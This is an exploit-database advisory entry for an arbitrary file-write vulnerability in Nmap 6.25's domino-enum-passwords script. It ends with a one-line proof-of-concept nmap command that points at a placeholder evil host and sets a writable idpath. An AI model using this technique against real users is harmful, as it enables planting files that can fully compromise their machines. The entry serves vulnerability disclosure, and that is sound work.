Nmap - Arbitrary File Write

2013-08-06T00:00:00
ID EXPLOITPACK:C5D81324B431D9088BB21B7CDA7D31BB
Type exploitpack
Reporter Piotr Duszynski
Modified 2013-08-06T00:00:00

Description

Source: https://www.securityfocus.com/bid/62024/info

Nmap is prone to an arbitrary file-write vulnerability.

An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.

Nmap 6.25 is vulnerable; other versions may also be affected. 

nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'